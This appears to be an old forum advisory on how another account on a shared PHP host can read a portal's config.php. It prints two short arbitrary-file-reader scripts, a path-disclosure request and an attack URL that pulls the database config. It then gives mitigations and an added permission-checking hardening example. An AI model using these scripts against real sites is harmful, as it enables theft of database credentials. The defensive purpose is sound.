If your PHP portal is installed on a shared server you must be careful.
Another user living on the same server (he has a hosting account on your server) can hack your portal!
How can he hack your portal?
With this script (script 1):
<?php
if (isset($a))
{
echo implode("", file("$a"));
}
?>

or this variant (script 2, same effect using $_GET instead of register_globals):

<?php
header('Content-Type: text/plain');
readfile($_GET['a']);
?>

1- The hacker must know your user ID on the hosting server, so he requests one of the PHP files belonging to your portal directly in his browser,
for example:
http://www.yourwebsite.com/forum/includes/functions.php?anyfunctionIntegerArgument=text

and the PHP error message printed by that file reveals the full path:

/home/yourID/public_html/forum/includes/functions.php error 607 in line 563

2- Now he uses one of the scripts above, for example script 1, like this:
http://www.hackerWebsite.com/script1.php?a=/home/yourID/public_html/forum/config.php

3- With a simple script he can then download your DB, or write to your DB, and ...
He can install the same portal himself, edit and change some code, then use your encrypted admin password to log in some times, and...
How can we solve this problem?
1- We must add this code to the prologue of all PHP files:

ini_set('display_errors', 'Off');
ini_set('log_errors', 'On');

2- You must rename your config.php file and edit every PHP file that includes or requires config.php. Then you must encrypt these files with Zend PHP Encoder or another encoder program.
So if a hacker finds your ID he will not find your DB config file.
3- Or use a dedicated server only for yourself.
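The following is an added example, not code from the original post: a hardening prologue that implements step 1 (errors logged, never displayed) and step 2 (renamed config file), plus a check that warns the admin when the config file is readable by other accounts on the host. The config file name and the log path are assumed names for the example.

```php
<?php
// Added example: hardening prologue for the portal's PHP files.
// Step 1 from the post: hide errors from the browser, log them instead,
// so a request to functions.php no longer reveals /home/yourID/... paths.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
// Assumed log path; keep it outside public_html so it is not served.
ini_set('error_log', __DIR__ . '/../logs/php_errors.log');
error_reporting(E_ALL);

// Step 2 from the post: the renamed config.php (assumed name).
define('CONFIG_FILE', __DIR__ . '/my_settings.php');

/**
 * Return true when $path can be read by "group" or "other".
 * On a shared host a mode such as 0644 lets every other account's
 * PHP script read the file with file() or readfile(), as in scripts 1 and 2.
 */
function config_world_readable(string $path): bool
{
    $mode = @fileperms($path);
    if ($mode === false) {
        return false; // missing file: require_once below reports it to the log
    }
    return ($mode & 0044) !== 0; // 0040 = group read, 0004 = other read
}

if (config_world_readable(CONFIG_FILE)) {
    // Log only; never echo the path to the visitor.
    error_log('config file is readable by other users, run: chmod 600 ' . CONFIG_FILE);
}

require_once CONFIG_FILE;
```

Note that on hosts where every site runs as the same web-server user (classic mod_php), file permissions alone do not separate accounts; the host must run PHP per user (suPHP, PHP-FPM pools) or enforce open_basedir for the chmod to help.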
In PHP-Nuke, if NukeSentinel is used and the IP tracker is on, then all users' usernames and passwords (even the admin's) are inserted into nuke_nsnst_tracked_ips!!!
So the Nuke owner or a hacker can see users' passwords.
If you register on portals you must use a different password.
If your password is the same as the one for your other important things, for example your e-mail password, your domain-panel password or your bank account, the hacker or the Nuke website owner can access them!
In other portals too, the owner can change the script code and find your password.